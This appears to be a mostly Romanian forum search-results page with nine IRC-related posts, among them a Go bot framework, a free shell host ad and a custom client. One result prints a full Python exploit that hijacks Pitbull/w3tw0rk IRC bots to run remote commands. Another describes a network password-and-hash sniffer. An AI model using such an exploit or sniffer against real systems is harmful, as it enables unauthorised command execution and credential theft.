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Found 9 results

  1. gophirc A simple IRC bot framework written from scratch, in Go. Description Event based IRC framework. Warning The API might break anytime. Framework managed events Manages server PING requests (not CTCP PING) Registers on first NOTICE * Identifies on RPL_WELCOME (event 001) Joins the received invites & sends a greeting to the channel Logs if the bot gets kicked from a channel Features Capability to connect to multiple servers Multiple per event callbacks State & general logging Graceful exit handled either by a SIGINT (Ctrl-C) Parses a user from an IRC formatted nick!user@host to a User{} Config implements a basic checking on values Already implemented basic commands - JOIN, PART, PRIVMSG, NOTICE, KICK, INVITE, MODE, CTCP commands Many (?) more More: https://github.com/vlad-s/gophirc Bonus, IRC bot using gophirc - gophircbot: https://github.com/vlad-s/gophircbot
  2. The Rust Programming Language https://air.mozilla.org/rust-release-party/ https://github.com/nrc/r4cppp cartea oficiala: The Rust Programming Language documentatia librariei standard: std - Rust forumul oficial: https://users.rust-lang.org/ irc oficial: #rust pe serverul irc.mozilla.org
  3. Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Sniffs URLs visited POST loads sent HTTP form logins/passwords HTTP basic auth logins/passwords HTTP searches FTP logins/passwords IRC logins/passwords POP logins/passwords IMAP logins/passwords Telnet logins/passwords SMTP logins/passwords SNMP community string NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc Kerberos SOURCE
  4. # thehunter.py # Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution # author: @shipcod3 # description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def usage(): print("USAGE: python thehunter.py nick \n") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot server = "us.dal.net" #irc server channel = "#buhaypirata" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 6667)) #connects to the server irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv) Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt
  5. UnixSSH.com – Free shell server provider based on FreeBSD/OpenBSD/NetBSD/Solaris. On our servers you can run IRC bouncers, servers and bots. Also you can found many advanced and standard tools for programming or network diagnostics. Shell environment is very secure and protected from other users (home directory, process, etc.) Shell features: HDD: 400MB MySQL: 100MB RAM: 512MB VRAM: 3500MB Proc: 20 - You can run IRC bot, IRC server, Screen, tmux - Personal website and vhost username.unixssh.com - MySQL (local and remote access) - FTP access - SSH access to shell - Extensive programming environment (C, C++, Perl, Python, JAVA(1.6, 1.7), PHP, Mono) - A lot installed software on shell (Catalyst, Django, Zope, Pylons, Boost C++, nasm, Ruby, Ruby on Rails, Erlang, MongoDB, Apache Maven, Tcl, Lua, Oidentd, Node.js, rhodecode, midnight commander, links, curl, unzip, unrar, unarj, unace, wget, git, cvs, rsync, subversion etc. - irssi, epic5, weechat, screen, tmux, znc, eggdrop, oidentd, psybnc, etc For more information check out our site UnixSSH.com or create account now Host: unixssh.com Port: 44 SSH Login: newx Pass: newx
  6. Salut all , am si eu o mica intrebare, nu vreau sa fiu luat in parere de rau , as dorii sa invat sa imi urc si eu pma'uri , perlii , pe ch'ul de irc , ma poate ajuta careva ? Tin sa va spun ca, ch'ul de irc il am de la un tovaras (cumparat) Nu stiu decat niste comenzii stupide , si am observat ca roboteii imi pleaca.. cum as putea sa urc eu singur sa nu stau sa apelez la altii ? Va multumesc si imi cer scuze daca am spus cv gresit. Ori ce raspuns e bun venit!
  7. Am facut un client de IRC special pentru canalul #rstforums de pe freenode Trebuie sa va logati cu userul si parola de pe forum (am facut asta pentru a preveni spamul, pentru a sti cine e cine, etc) Trebuie sa aveti instalat .net Framework 4.5 pentru a rula programul. Screenshots: Login form: Main form: Ce stie sa faca: - Logare pe baza forumului - Design frumusel - Sunet la primirea unui mesaj - Iconita din taskbar blinkaie la primirea unui mesaj - Trimiterea mesajului prin apasarea tastei enter in textbox Buguri existente: - Uneori crash la inchiderea programului. - Ferestrele se numesc Form1/Form2, am uitat sa schimb numele. Daca gasiti alte buguri, va rog sa le raportati. Download: IRC Client.exe — RGhost — file sharing Virus scan: https://www.virustotal.com/en/file/aca49cfc58dd5be22e9d2ac25ba08b2e8d66e670fd542a94a27cd7e4b0b0bba6/analysis/1427018283/ Update 1: - va puteti loga cu username-uri care au puncte in ele - notificare cand in user iese/intra/isi schimba nickul
  8. salut baieti. Vin cu propunerea pt infiintarea unui IRC server pt chat. bineinteles adminii raman la statutul oficial pe server. Sunt sigur ca exista multi pe aici care detin valuta si sute de optiuni pt gazduirea unui server de acest gen. Hai totusi sa nu uitam vremurile bune, noi astia mai in varsta..... cand era /msg x@undernet.org login xxx xxx ))) bine... puteti baga optiunea directa si din web cum are apropo.ro ...sau um avea.. habar nu mai am ce e pe acolo. P.S. o retea de socializare pt amatorii de informatica nu prea ar strica nici ea si banuiesc ca ar fi prima in domeniu. P.P.S.: noi, romanii suntem cei mai inovativi. hai sa profitam.
  9. Mi-am amintit de articolul asta dupa ce am vazut topicul cu "Hackerul de Romania". Cititi si luati aminte: http://linuxreviews.org/howtos/l33t/
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